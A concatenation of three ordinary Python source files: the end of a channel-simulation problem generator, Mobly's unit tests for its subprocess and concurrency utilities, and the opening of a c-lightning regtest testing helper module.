If cpx, the returned X has shape (batches,C*Nu,Nr),
otherwise (batches,2*C*Nu,Nr)
"""
Nr,C,Nu,Ns,S = self.Nr,self.C,self.Nu,self.Ns,self.S
L,ang,rice_k_dB,ple = self.L,self.ang,self.rice_k_dB,self.ple
X = np.zeros((batches,C,Nu,Nr),dtype=np.complex64)
for i in range(batches):
for c in range(C): #c==0 indicates all users are in the base stations' cell ("near")
###################################
# choose how many and which users are active in this cell
K = np.random.binomial(Nu,self.beta) # number of active users in this cell E[K] = Nu*beta
active_users = np.random.permutation(Nu)[:K]
#NOTE: Tensors below have shape (user,path,angle), until Z when we sum the path dimension.
# how far (weak) is each user?
if c==0:
dist = abs( hexagonal_uniform( K ,as_complex=True) )
elif 0<c<7:
dist = abs( 2+hexagonal_uniform( K ,as_complex=True) )
else:
assert False,'assuming 1 or 7 hexagonal cells'
dist.shape = (K,1,1)
gain = 1/(1+dist**ple)
# The L paths per user impinge on our linear array with clustered angles theta.
# All paths per user start at theta0 and are uniformly distributed in the next `ang` degrees.
# (theta units=radians,zero means broadside to the linear array)
theta0 = np.random.uniform(0,2*pi,(K,1,1))
theta = np.mod( theta0 + np.random.uniform(0,ang*pi/180,(K,L,1)) ,2*pi)
# different Ricean gains for each of the paths
direct_path = crandn((K,1,1),set_mag=1.0) # one dominant path component
other_paths = 10**(-rice_k_dB/20)*sqrt(.5)*crandn((K,L,1))
# each of the different paths impinges onto our linear array according to the array spacing and theta
E = gain*(direct_path + other_paths) * np.exp(1j* theta * np.arange(Nr) )
# sum the different paths, Z.shape is (user,angle)
Z = E.sum(axis=1)
if np.isnan(Z).any():
raise RuntimeError()
# update the data set for these users' signal
X[i,c,active_users] = np.fft.fft(Z,Nr,axis=-1)/Nr
###################################
# collapse the C and Nu dimensions into one
X.shape = (batches,C*Nu,Nr)
if self.ambig:
X = X[:,np.random.permutation(C*Nu),:]
if not self.cpx:
X2 = np.empty( (batches,2*C*Nu,Nr),np.float32)
X2[:,:C*Nu,:] = X.real
X2[:,C*Nu:,:] = X.imag
X = X2
if self.scramble:
shp = X.shape
X = np.random.permutation(X.ravel())
X.shape = shp
if self.mmv2d:
# the "sample vector" dimension should remain in second-to-last dimension
N = X.shape[-2]
X = np.reshape( np.transpose(X,(1,0,2)) ,(N,-1) )
return X
def fwd(self,X):
'forward linear operator'
assert np.iscomplexobj(X) == self.cpx,'wrong value for cpx in constructor'
return np.einsum('...jk,mj->...mk',X,self.S)
def adj(self,X):
'adjoint linear operator'
assert np.iscomplexobj(Y) == self.cpx,'wrong value for cpx in constructor'
return np.einsum('...jk,mj->...mk',X,self.S.T.conj())
def add_noise(self,Y0):
'add noise at the given SNR, returns Y0+W,wvar'
wvar = (la.norm(Y0)**2/Y0.size) * 10**(-self.SNR_dB/10)
if self.cpx:
Y =(Y0 + crandn(Y0.shape) * sqrt(wvar/2)).astype(np.complex64,copy=False)
else:
Y = (Y0 + np.random.normal(scale=sqrt(wvar),size=Y0.shape) ).astype(np.float32,copy=False)
return Y,wvar
def genYX(self,batches=1,nsubprocs=None):
t0 = time.time()
if nsubprocs is None:
X = self.genX(batches)
Y0 = self.fwd(X)
Y,_ = self.add_noise(Y0)
else:
if not hasattr(self,'qgen'):
import multiprocessing as mp
self.qgen = mp.Queue(maxsize=nsubprocs) # one slot per subprocess
def makesets():
np.random.seed() #MUST reseed or every subprocess will generate the same data
while True:
X = self.genX(batches)
Y0 = self.fwd(X)
Y,_ = self.add_noise(Y0)
self.qgen.put((Y,X),block=True)
self.subprocs = []
for i in range(nsubprocs):
prc = mp.Process(target=makesets)
prc.daemon=True
prc.start()
self.subprocs.append(prc)
Y,X = self.qgen.get(True)
et = time.time() - t0
self.timegen += et
return (Y,X)
def kill_subprocs(self):
if hasattr(self,'qgen') and hasattr(self,'subprocs'):
for prc in self.subprocs:
prc.terminate()
prc.join()
del self.qgen
del self.subprocs
if __name__ == '__main__':
import unittest
class RapTest(unittest.TestCase):
def _test_awgn(self,cpx):
snr = np.random.uniform(3,20)
p = Problem(cpx=cpx,SNR_dB=snr)
X = p.genX(5)
self.assertEqual( np.iscomplexobj(X) , cpx )
Y0 = p.fwd(X)
self.assertEqual( np.iscomplexobj(Y0) , cpx )
Y,wvar = p.add_noise(Y0)
self.assertEqual( np.iscomplexobj(Y) , cpx )
snr_obs = -20*np.log10( la.norm(Y-Y0)/la.norm(Y0))
self.assertTrue( abs(snr-snr_obs) < 1.0, 'gross error in add_noise')
wvar_obs = la.norm(Y0-Y)**2/Y.size
self.assertTrue( .5 < wvar_obs/wvar < 1.5, 'gross error in add_noise wvar')
def test_awgn_cpx(self):
self._test_awgn(True)
def test_awgn_real(self):
self._test_awgn(False)
unittest.main(verbosity=2)
#exec(open(os.environ['PYTHONSTARTUP']).read(),globals(),globals())
|
utils_test.py
|
# Copyright 2016 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from concurrent import futures
import io
import logging
import multiprocessing
import os
import platform
import shutil
import signal
import socket
import subprocess
import sys
import tempfile
import threading
import time
import unittest
from unittest import mock
from mobly import base_test
from mobly import signals
from mobly import test_runner
from mobly import utils
from tests.lib import integration_test
from tests.lib import mock_controller
from tests.lib import mock_instrumentation_test
from tests.lib import multiple_subclasses_module
MOCK_AVAILABLE_PORT = 5
ADB_MODULE_PACKAGE_NAME = 'mobly.controllers.android_device_lib.adb'
def _is_process_running(pid):
"""Whether the process with given PID is running."""
if os.name == 'nt':
return str(pid) in subprocess.check_output([
'tasklist',
'/fi',
f'PID eq {pid}',
]).decode()
try:
# os.kill throws OSError if the process with PID pid is not running.
# signal.SIG_DFL is one of two standard signal handling options, it will
# simply perform the default function for the signal.
os.kill(pid, signal.SIG_DFL)
except OSError:
return False
return True
def _fork_children_processes(name, successors):
"""Forks children processes and its descendants recursively.
Args:
name: The name of this process.
successors: The args for the descendant processes.
"""
logging.info('Process "%s" started, PID: %d!', name, os.getpid())
children_process = [
multiprocessing.Process(target=_fork_children_processes, args=args)
for args in successors
]
for child_process in children_process:
child_process.start()
if 'child' in name:
time.sleep(4)
for child_process in children_process:
child_process.join()
logging.info('Process "%s" exit.', name)
class UtilsTest(unittest.TestCase):
"""Unit tests for the implementation of everything under mobly.utils."""
def setUp(self):
super().setUp()
self.tmp_dir = tempfile.mkdtemp()
def tearDown(self):
super().tearDown()
shutil.rmtree(self.tmp_dir)
def sleep_cmd(self, wait_secs):
if platform.system() == 'Windows':
python_code = ['import time', 'time.sleep(%s)' % wait_secs]
return ['python', '-c', 'exec("%s")' % r'\r\n'.join(python_code)]
else:
return ['sleep', str(wait_secs)]
@unittest.skipIf(os.name == "nt",
'collect_process_tree only available on Unix like system.')
@mock.patch('subprocess.check_output')
def test_collect_process_tree_without_child(self, mock_check_output):
mock_check_output.side_effect = (subprocess.CalledProcessError(
-1, 'fake_cmd'))
pid_list = utils._collect_process_tree(123)
self.assertListEqual(pid_list, [])
@unittest.skipIf(os.name == "nt",
'collect_process_tree only available on Unix like system.')
@mock.patch('subprocess.check_output')
def test_collect_process_tree_returns_list(self, mock_check_output):
# Creates subprocess 777 with descendants looks like:
# subprocess 777
# ├─ 780 (child)
# │ ├─ 888 (grandchild)
# │ │ ├─ 913 (great grandchild)
# │ │ └─ 999 (great grandchild)
# │ └─ 890 (grandchild)
# ├─ 791 (child)
# └─ 799 (child)
mock_check_output.side_effect = (
# ps -o pid --ppid 777 --noheaders
b'780\n 791\n 799\n',
# ps -o pid --ppid 780 --noheaders
b'888\n 890\n',
# ps -o pid --ppid 791 --noheaders
subprocess.CalledProcessError(-1, 'fake_cmd'),
# ps -o pid --ppid 799 --noheaders
subprocess.CalledProcessError(-1, 'fake_cmd'),
# ps -o pid --ppid 888 --noheaders
b'913\n 999\n',
# ps -o pid --ppid 890 --noheaders
subprocess.CalledProcessError(-1, 'fake_cmd'),
# ps -o pid --ppid 913 --noheaders
subprocess.CalledProcessError(-1, 'fake_cmd'),
# ps -o pid --ppid 999 --noheaders
subprocess.CalledProcessError(-1, 'fake_cmd'),
)
pid_list = utils._collect_process_tree(777)
self.assertListEqual(pid_list, [780, 791, 799, 888, 890, 913, 999])
@mock.patch.object(os, 'kill')
@mock.patch.object(utils, '_collect_process_tree')
def test_kill_process_tree_on_unix_succeeds(self, mock_collect_process_tree,
mock_os_kill):
mock_collect_process_tree.return_value = [799, 888, 890]
mock_proc = mock.MagicMock()
mock_proc.pid = 123
with mock.patch.object(os, 'name', new='posix'):
utils._kill_process_tree(mock_proc)
mock_os_kill.assert_has_calls([
mock.call(799, signal.SIGTERM),
mock.call(888, signal.SIGTERM),
mock.call(890, signal.SIGTERM),
])
mock_proc.kill.assert_called_once()
@mock.patch.object(os, 'kill')
@mock.patch.object(utils, '_collect_process_tree')
def test_kill_process_tree_on_unix_kill_children_failed_throws_error(
self, mock_collect_process_tree, mock_os_kill):
mock_collect_process_tree.return_value = [799, 888, 890]
mock_os_kill.side_effect = [None, OSError(), None]
mock_proc = mock.MagicMock()
mock_proc.pid = 123
with mock.patch.object(os, 'name', new='posix'):
with self.assertRaises(utils.Error):
utils._kill_process_tree(mock_proc)
mock_proc.kill.assert_called_once()
@mock.patch.object(utils, '_collect_process_tree')
def test_kill_process_tree_on_unix_kill_proc_failed_throws_error(
self, mock_collect_process_tree):
mock_collect_process_tree.return_value = []
mock_proc = mock.MagicMock()
mock_proc.pid = 123
mock_proc.kill.side_effect = subprocess.SubprocessError()
with mock.patch.object(os, 'name', new='posix'):
with self.assertRaises(utils.Error):
utils._kill_process_tree(mock_proc)
mock_proc.kill.assert_called_once()
@mock.patch('subprocess.check_output')
def test_kill_process_tree_on_windows_calls_taskkill(self, mock_check_output):
mock_proc = mock.MagicMock()
mock_proc.pid = 123
with mock.patch.object(os, 'name', new='nt'):
utils._kill_process_tree(mock_proc)
mock_check_output.assert_called_once_with([
'taskkill',
'/F',
'/T',
'/PID',
'123',
])
def test_run_command(self):
ret, _, _ = utils.run_command(self.sleep_cmd(0.01))
self.assertEqual(ret, 0)
def test_run_command_with_timeout(self):
ret, _, _ = utils.run_command(self.sleep_cmd(0.01), timeout=4)
self.assertEqual(ret, 0)
def test_run_command_with_timeout_expired(self):
with self.assertRaisesRegex(subprocess.TimeoutExpired, 'sleep'):
_ = utils.run_command(self.sleep_cmd(4), timeout=0.01)
@mock.patch('threading.Timer')
@mock.patch('subprocess.Popen')
def test_run_command_with_default_params(self, mock_popen, mock_timer):
mock_command = mock.MagicMock(spec=dict)
mock_proc = mock_popen.return_value
mock_proc.communicate.return_value = ('fake_out', 'fake_err')
mock_proc.returncode = 0
out = utils.run_command(mock_command)
self.assertEqual(out, (0, 'fake_out', 'fake_err'))
mock_popen.assert_called_with(
mock_command,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=False,
cwd=None,
env=None,
universal_newlines=False,
)
mock_timer.assert_not_called()
@mock.patch('threading.Timer')
@mock.patch('subprocess.Popen')
def test_run_command_with_custom_params(self, mock_popen, mock_timer):
mock_command = mock.MagicMock(spec=dict)
mock_stdout = mock.MagicMock(spec=int)
mock_stderr = mock.MagicMock(spec=int)
mock_shell = mock.MagicMock(spec=bool)
mock_timeout = 1234
mock_env = mock.MagicMock(spec=dict)
mock_universal_newlines = mock.MagicMock(spec=bool)
mock_proc = mock_popen.return_value
mock_proc.communicate.return_value = ('fake_out', 'fake_err')
mock_proc.returncode = 127
out = utils.run_command(mock_command,
stdout=mock_stdout,
stderr=mock_stderr,
shell=mock_shell,
timeout=mock_timeout,
env=mock_env,
universal_newlines=mock_universal_newlines)
self.assertEqual(out, (127, 'fake_out', 'fake_err'))
mock_popen.assert_called_with(
mock_command,
stdout=mock_stdout,
stderr=mock_stderr,
shell=mock_shell,
cwd=None,
env=mock_env,
universal_newlines=mock_universal_newlines,
)
mock_timer.assert_called_with(1234, mock.ANY)
def test_run_command_with_universal_newlines_false(self):
_, out, _ = utils.run_command(self.sleep_cmd(0.01),
universal_newlines=False)
self.assertIsInstance(out, bytes)
def test_run_command_with_universal_newlines_true(self):
_, out, _ = utils.run_command(self.sleep_cmd(0.01), universal_newlines=True)
self.assertIsInstance(out, str)
def test_start_standing_subproc(self):
try:
p = utils.start_standing_subprocess(self.sleep_cmd(4))
self.assertTrue(_is_process_running(p.pid))
os.kill(p.pid, signal.SIGTERM)
finally:
p.stdout.close()
p.stderr.close()
p.wait()
@mock.patch('subprocess.Popen')
def test_start_standing_subproc_without_env(self, mock_popen):
utils.start_standing_subprocess(self.sleep_cmd(0.01))
mock_popen.assert_called_with(
self.sleep_cmd(0.01),
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=False,
env=None,
)
@mock.patch('subprocess.Popen')
def test_start_standing_subproc_with_custom_env(self, mock_popen):
mock_env = mock.MagicMock(spec=dict)
utils.start_standing_subprocess(self.sleep_cmd(0.01), env=mock_env)
mock_popen.assert_called_with(
self.sleep_cmd(0.01),
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=False,
env=mock_env,
)
def test_stop_standing_subproc(self):
p = utils.start_standing_subprocess(self.sleep_cmd(4))
utils.stop_standing_subprocess(p)
self.assertFalse(_is_process_running(p.pid))
def test_stop_standing_subproc_without_pipe(self):
p = subprocess.Popen(self.sleep_cmd(4))
self.assertIsNone(p.stdout)
utils.stop_standing_subprocess(p)
self.assertFalse(_is_process_running(p.pid))
def test_stop_standing_subproc_and_descendants(self):
# Creates subprocess A with descendants looks like:
# subprocess A
# ├─ B (child)
# │ ├─ X (grandchild)
# │ │ ├─ 1 (great grandchild)
# │ │ └─ 2 (great grandchild)
# │ └─ Y (grandchild)
# ├─ C (child)
# └─ D (child)
process_tree_args = ('subprocess_a', [
('child_b', [
('grand_child_x', [
('great_grand_child_1', []),
('great_grand_child_2', []),
]),
('grand_child_y', []),
]),
('child_c', []),
('child_d', []),
])
subprocess_a = multiprocessing.Process(target=_fork_children_processes,
args=process_tree_args)
subprocess_a.start()
mock_subprocess_a_popen = mock.MagicMock()
mock_subprocess_a_popen.pid = subprocess_a.pid
# Sleep a while to create all processes.
time.sleep(0.01)
utils.stop_standing_subprocess(mock_subprocess_a_popen)
subprocess_a.join(timeout=1)
mock_subprocess_a_popen.wait.assert_called_once()
@unittest.skipIf(sys.version_info >= (3, 4) and sys.version_info < (3, 5),
'Python 3.4 does not support `None` max_workers.')
def test_concurrent_exec_when_none_workers(self):
def adder(a, b):
return a + b
with mock.patch.object(futures,
'ThreadPoolExecutor',
wraps=futures.ThreadPoolExecutor) as thread_pool_spy:
results = utils.concurrent_exec(adder, [(1, 1), (2, 2)], max_workers=None)
thread_pool_spy.assert_called_once_with(max_workers=None)
self.assertEqual(len(results), 2)
self.assertIn(2, results)
self.assertIn(4, results)
def test_concurrent_exec_when_default_max_workers(self):
def adder(a, b):
return a + b
with mock.patch.object(futures,
'ThreadPoolExecutor',
wraps=futures.ThreadPoolExecutor) as thread_pool_spy:
results = utils.concurrent_exec(adder, [(1, 1), (2, 2)])
thread_pool_spy.assert_called_once_with(max_workers=30)
self.assertEqual(len(results), 2)
self.assertIn(2, results)
self.assertIn(4, results)
def test_concurrent_exec_when_custom_max_workers(self):
def adder(a, b):
return a + b
with mock.patch.object(futures,
'ThreadPoolExecutor',
wraps=futures.ThreadPoolExecutor) as thread_pool_spy:
results = utils.concurrent_exec(adder, [(1, 1), (2, 2)], max_workers=1)
thread_pool_spy.assert_called_once_with(max_workers=1)
self.assertEqual(len(results), 2)
self.assertIn(2, results)
self.assertIn(4, results)
def test_concurrent_exec_makes_all_calls(self):
mock_function = mock.MagicMock()
_ = utils.concurrent_exec(mock_function, [
(1, 1),
(2, 2),
(3, 3),
])
self.assertEqual(mock_function.call_count, 3)
mock_function.assert_has_calls(
[mock.call(1, 1), mock.call(2, 2),
mock.call(3, 3)], any_order=True)
def test_concurrent_exec_generates_results(self):
def adder(a, b):
return a + b
results = utils.concurrent_exec(adder, [(1, 1), (2, 2)])
self.assertEqual(len(results), 2)
self.assertIn(2, results)
self.assertIn(4, results)
def test_concurrent_exec_when_exception_makes_all_calls(self):
mock_call_recorder = mock.MagicMock()
lock_call_count = threading.Lock()
def fake_int(a,):
with lock_call_count:
mock_call_recorder(a)
return int(a)
utils.concurrent_exec(fake_int, [
(1,),
('123',),
('not_int',),
(5435,),
])
self.assertEqual(mock_call_recorder.call_count, 4)
mock_call_recorder.assert_has_calls([
mock.call(1),
mock.call('123'),
mock.call('not_int'),
mock.call(5435),
],
any_order=True)
def test_concurrent_exec_when_exception_generates_results(self):
mock_call_recorder = mock.MagicMock()
lock_call_count = threading.Lock()
def fake_int(a,):
with lock_call_count:
mock_call_recorder(a)
return int(a)
results = utils.concurrent_exec(fake_int, [
(1,),
('123',),
('not_int',),
(5435,),
])
self.assertEqual(len(results), 4)
self.assertIn(1, results)
self.assertIn(123, results)
self.assertIn(5435, results)
exceptions = [result for result in results if isinstance(result, Exception)]
self.assertEqual(len(exceptions), 1)
self.assertIsInstance(exceptions[0], ValueError)
def test_concurrent_exec_when_multiple_exceptions_makes_all_calls(self):
mock_call_recorder = mock.MagicMock()
lock_call_count = threading.Lock()
def fake_int(a,):
with lock_call_count:
mock_call_recorder(a)
return int(a)
utils.concurrent_exec(fake_int, [
(1,),
('not_int1',),
('not_int2',),
(5435,),
])
self.assertEqual(mock_call_recorder.call_count, 4)
mock_call_recorder.assert_has_calls([
mock.call(1),
mock.call('not_int1'),
mock.call('not_int2'),
mock.call(5435),
],
any_order=True)
def test_concurrent_exec_when_multiple_exceptions_generates_results(self):
mock_call_recorder = mock.MagicMock()
lock_call_count = threading.Lock()
def fake_int(a,):
with lock_call_count:
mock_call_recorder(a)
return int(a)
results = utils.concurrent_exec(fake_int, [
(1,),
('not_int1',),
('not_int2',),
(5435,),
])
self.assertEqual(len(results), 4)
self.assertIn(1, results)
self.assertIn(5435, results)
exceptions = [result for result in results if isinstance(result, Exception)]
self.assertEqual(len(exceptions), 2)
self.assertIsInstance(exceptions[0], ValueError)
self.assertIsInstance(exceptions[1], ValueError)
self.assertNotEqual(exceptions[0], exceptions[1])
def test_concurrent_exec_when_raising_exception_generates_results(self):
def adder(a, b):
return a + b
results = utils.concurrent_exec(adder, [(1, 1), (2, 2)],
raise_on_exception=True)
self.assertEqual(len(results), 2)
self.assertIn(2, results)
self.assertIn(4, results)
def test_concurrent_exec_when_raising_exception_makes_all_calls(self):
mock_call_recorder = mock.MagicMock()
lock_call_count = threading.Lock()
def fake_int(a,):
with lock_call_count:
mock_call_recorder(a)
return int(a)
with self.assertRaisesRegex(RuntimeError, '.*not_int.*'):
_ = utils.concurrent_exec(fake_int, [
(1,),
('123',),
('not_int',),
(5435,),
],
raise_on_exception=True)
self.assertEqual(mock_call_recorder.call_count, 4)
mock_call_recorder.assert_has_calls([
mock.call(1),
mock.call('123'),
mock.call('not_int'),
mock.call(5435),
],
any_order=True)
def test_concurrent_exec_when_raising_multiple_exceptions_makes_all_calls(
self):
mock_call_recorder = mock.MagicMock()
lock_call_count = threading.Lock()
def fake_int(a,):
with lock_call_count:
mock_call_recorder(a)
return int(a)
with self.assertRaisesRegex(
RuntimeError,
r'(?m).*(not_int1(.|\s)+not_int2|not_int2(.|\s)+not_int1).*'):
_ = utils.concurrent_exec(fake_int, [
(1,),
('not_int1',),
('not_int2',),
(5435,),
],
raise_on_exception=True)
self.assertEqual(mock_call_recorder.call_count, 4)
mock_call_recorder.assert_has_calls([
mock.call(1),
mock.call('not_int1'),
mock.call('not_int2'),
mock.call(5435),
],
any_order=True)
def test_create_dir(self):
new_path = os.path.join(self.tmp_dir, 'haha')
self.assertFalse(os.path.exists(new_path))
utils.create_dir(new_path)
self.assertTrue(os.path.exists(new_path))
def test_create_dir_already_exists(self):
self.assertTrue(os.path.exists(self.tmp_dir))
utils.create_dir(self.tmp_dir)
self.assertTrue(os.path.exists(self.tmp_dir))
@mock.patch(f'{ADB_MODULE_PACKAGE_NAME}.is_adb_available', return_value=True)
@mock.patch(f'{ADB_MODULE_PACKAGE_NAME}.list_occupied_adb_ports')
@mock.patch('portpicker.pick_unused_port', return_value=MOCK_AVAILABLE_PORT)
def test_get_available_port_positive(self, *_):
self.assertEqual(utils.get_available_host_port(), MOCK_AVAILABLE_PORT)
@mock.patch(f'{ADB_MODULE_PACKAGE_NAME}.is_adb_available', return_value=False)
@mock.patch('portpicker.pick_unused_port', return_value=MOCK_AVAILABLE_PORT)
@mock.patch(f'{ADB_MODULE_PACKAGE_NAME}.list_occupied_adb_ports')
def test_get_available_port_positive_no_adb(self,
mock_list_occupied_adb_ports, *_):
self.assertEqual(utils.get_available_host_port(), MOCK_AVAILABLE_PORT)
mock_list_occupied_adb_ports.assert_not_called()
@mock.patch(f'{ADB_MODULE_PACKAGE_NAME}.is_adb_available', return_value=True)
@mock.patch(f'{ADB_MODULE_PACKAGE_NAME}.list_occupied_adb_ports',
return_value=[MOCK_AVAILABLE_PORT])
@mock.patch('portpicker.pick_unused_port', return_value=MOCK_AVAILABLE_PORT)
def test_get_available_port_negative(self, *_):
with self.assertRaisesRegex(utils.Error, 'Failed to find.* retries'):
utils.get_available_host_port()
@mock.patch(f'{ADB_MODULE_PACKAGE_NAME}.list_occupied_adb_ports')
def test_get_available_port_returns_free_port(self, _):
"""Verifies logic to pick a free port on the host.
Test checks we can bind to either an ipv4 or ipv6 socket on the port
returned by get_available_host_port.
"""
port = utils.get_available_host_port()
got_socket = False
for family in (socket.AF_INET, socket.AF_INET6):
try:
s = socket.socket(family, socket.SOCK_STREAM)
got_socket = True
break
except socket.error:
continue
self.assertTrue(got_socket)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
try:
s.bind(('localhost', port))
finally:
s.close()
def test_load_file_to_base64_str_reads_bytes_file_as_base64_string(self):
tmp_file_path = os.path.join(self.tmp_dir, 'b64.bin')
expected_base64_encoding = u'SGVsbG93IHdvcmxkIQ=='
with io.open(tmp_file_path, 'wb') as f:
f.write(b'Hellow world!')
self.assertEqual(utils.load_file_to_base64_str(tmp_file_path),
expected_base64_encoding)
def test_load_file_to_base64_str_reads_text_file_as_base64_string(self):
tmp_file_path = os.path.join(self.tmp_dir, 'b64.bin')
expected_base64_encoding = u'SGVsbG93IHdvcmxkIQ=='
with io.open(tmp_file_path, 'w', encoding='utf-8') as f:
f.write(u'Hellow world!')
self.assertEqual(utils.load_file_to_base64_str(tmp_file_path),
expected_base64_encoding)
def test_load_file_to_base64_str_reads_unicode_file_as_base64_string(self):
tmp_file_path = os.path.join(self.tmp_dir, 'b64.bin')
expected_base64_encoding = u'6YCa'
with io.open(tmp_file_path, 'w', encoding='utf-8') as f:
f.write(u'\u901a')
self.assertEqual(utils.load_file_to_base64_str(tmp_file_path),
expected_base64_encoding)
def test_cli_cmd_to_string(self):
cmd = ['"adb"', 'a b', 'c//']
self.assertEqual(utils.cli_cmd_to_string(cmd), '\'"adb"\' \'a b\' c//')
cmd = 'adb -s meme do something ab_cd'
self.assertEqual(utils.cli_cmd_to_string(cmd), cmd)
def test_get_settable_properties(self):
class SomeClass:
regular_attr = 'regular_attr'
_foo = 'foo'
_bar = 'bar'
@property
def settable_prop(self):
return self._foo
@settable_prop.setter
def settable_prop(self, new_foo):
self._foo = new_foo
@property
def readonly_prop(self):
return self._bar
def func(self):
"""Func should not be considered as a settable prop."""
actual = utils.get_settable_properties(SomeClass)
self.assertEqual(actual, ['settable_prop'])
def test_find_subclasses_in_module_when_one_subclass(self):
subclasses = utils.find_subclasses_in_module([base_test.BaseTestClass],
integration_test)
self.assertEqual(len(subclasses), 1)
self.assertEqual(subclasses[0], integration_test.IntegrationTest)
def test_find_subclasses_in_module_when_indirect_subclass(self):
subclasses = utils.find_subclasses_in_module([base_test.BaseTestClass],
mock_instrumentation_test)
self.assertEqual(len(subclasses), 1)
self.assertEqual(subclasses[0],
mock_instrumentation_test.MockInstrumentationTest)
def test_find_subclasses_in_module_when_no_subclasses(self):
subclasses = utils.find_subclasses_in_module([base_test.BaseTestClass],
mock_controller)
self.assertEqual(len(subclasses), 0)
def test_find_subclasses_in_module_when_multiple_subclasses(self):
subclasses = utils.find_subclasses_in_module([base_test.BaseTestClass],
multiple_subclasses_module)
self.assertEqual(len(subclasses), 2)
self.assertIn(multiple_subclasses_module.Subclass1Test, subclasses)
self.assertIn(multiple_subclasses_module.Subclass2Test, subclasses)
def test_find_subclasses_in_module_when_multiple_base_classes(self):
subclasses = utils.find_subclasses_in_module(
[base_test.BaseTestClass, test_runner.TestRunner],
multiple_subclasses_module)
self.assertEqual(len(subclasses), 4)
self.assertIn(multiple_subclasses_module.Subclass1Test, subclasses)
self.assertIn(multiple_subclasses_module.Subclass2Test, subclasses)
self.assertIn(multiple_subclasses_module.Subclass1Runner, subclasses)
self.assertIn(multiple_subclasses_module.Subclass2Runner, subclasses)
def test_find_subclasses_in_module_when_only_some_base_classes_present(self):
subclasses = utils.find_subclasses_in_module(
[signals.TestSignal, test_runner.TestRunner],
multiple_subclasses_module)
self.assertEqual(len(subclasses), 2)
self.assertIn(multiple_subclasses_module.Subclass1Runner, subclasses)
self.assertIn(multiple_subclasses_module.Subclass2Runner, subclasses)
def test_find_subclass_in_module_when_one_subclass(self):
subclass = utils.find_subclass_in_module(base_test.BaseTestClass,
integration_test)
self.assertEqual(subclass, integration_test.IntegrationTest)
def test_find_subclass_in_module_when_indirect_subclass(self):
subclass = utils.find_subclass_in_module(base_test.BaseTestClass,
mock_instrumentation_test)
self.assertEqual(subclass,
mock_instrumentation_test.MockInstrumentationTest)
def test_find_subclass_in_module_when_no_subclasses(self):
with self.assertRaisesRegex(
ValueError, '.*Expected 1 subclass of BaseTestClass per module, found'
r' \[\].*'):
_ = utils.find_subclass_in_module(base_test.BaseTestClass,
mock_controller)
def test_find_subclass_in_module_when_multiple_subclasses(self):
with self.assertRaisesRegex(
ValueError, '.*Expected 1 subclass of BaseTestClass per module, found'
r' \[(\'Subclass1Test\', \'Subclass2Test\''
r'|\'Subclass2Test\', \'Subclass1Test\')\].*'):
_ = utils.find_subclass_in_module(base_test.BaseTestClass,
multiple_subclasses_module)
if __name__ == '__main__':
unittest.main()
|
utils.py
|
from bitcoin.rpc import RawProxy as BitcoinProxy
from pyln.testing.btcproxy import BitcoinRpcProxy
from collections import OrderedDict
from decimal import Decimal
from ephemeral_port_reserve import reserve
from pyln.client import LightningRpc
import json
import logging
import lzma
import math
import os
import random
import re
import shutil
import sqlite3
import string
import struct
import subprocess
import sys
import threading
import time
BITCOIND_CONFIG = {
"regtest": 1,
"rpcuser": "rpcuser",
"rpcpassword": "rpcpass",
}
LIGHTNINGD_CONFIG = OrderedDict({
"log-level": "debug",
"cltv-delta": 6,
"cltv-final": 5,
"watchtime-blocks": 5,
"rescan": 1,
'disable-dns': None,
})
def env(name, default=None):
"""Access to environment variables
Allows access to environment variables, falling back to config.vars (part
of c-lightning's `./configure` output), and finally falling back to a
default value.
"""
fname = 'config.vars'
if os.path.exists(fname):
lines = open(fname, 'r').readlines()
config = dict([(line.rstrip().split('=', 1)) for line in lines])
else:
config = {}
if name in os.environ:
return os.environ[name]
elif name in config:
return config[name]
else:
return default
VALGRIND = env("VALGRIND") == "1"
TEST_NETWORK = env("TEST_NETWORK", 'regtest')
DEVELOPER = env("DEVELOPER", "0") == "1"
TEST_DEBUG = env("TEST_DEBUG", "0") == "1"
SLOW_MACHINE = env("SLOW_MACHINE", "0") == "1"
TIMEOUT = int(env("TIMEOUT", 180 if SLOW_MACHINE else 60))
if TEST_DEBUG:
logging.basicConfig(level=logging.DEBUG, stream=sys.stdout)
def wait_for(success, timeout=TIMEOUT):
start_time = time.time()
interval = 0.25
while not success() and time.time() < start_time + timeout:
time.sleep(interval)
interval *= 2
if interval > 5:
interval = 5
if time.time() > start_time + timeout:
raise ValueError("Error waiting for {}", success)
def write_config(filename, opts, regtest_opts=None, section_name='regtest'):
with open(filename, 'w') as f:
for k, v in opts.items():
f.write("{}={}\n".format(k, v))
if regtest_opts:
f.write("[{}]\n".format(section_name))
for k, v in regtest_opts.items():
f.write("{}={}\n".format(k, v))
def only_one(arr):
"""Many JSON RPC calls return an array; often we only expect a single entry
"""
assert len(arr) == 1
return arr[0]
def sync_blockheight(bitcoind, nodes):
height = bitcoind.rpc.getblockchaininfo()['blocks']
for n in nodes:
wait_for(lambda: n.rpc.getinfo()['blockheight'] == height)
def wait_channel_quiescent(n1, n2):
wait_for(lambda: only_one(only_one(n1.rpc.listpeers(n2.info['id'])['peers'])['channels'])['htlcs'] == [])
wait_for(lambda: only_one(only_one(n2.rpc.listpeers(n1.info['id'])['peers'])['channels'])['htlcs'] == [])
def get_tx_p2wsh_outnum(bitcoind, tx, amount):
"""Get output number of this tx which is p2wsh of amount"""
decoded = bitcoind.rpc.decoderawtransaction(tx, True)
for out in decoded['vout']:
if out['scriptPubKey']['type'] == 'witness_v0_scripthash':
if out['value'] == Decimal(amount) / 10**8:
return out['n']
return None
class TailableProc(object):
"""A monitorable process that we can start, stop and tail.
This is the base class for the daemons. It allows us to directly
tail the processes and react to their output.
"""
def __init__(self, outputDir=None, verbose=True):
self.logs = []
self.logs_cond = threading.Condition(threading.RLock())
self.env = os.environ.copy()
self.running = False
self.proc = None
self.outputDir = outputDir
self.logsearch_start = 0
# Should we be logging lines we read from stdout?
self.verbose = verbose
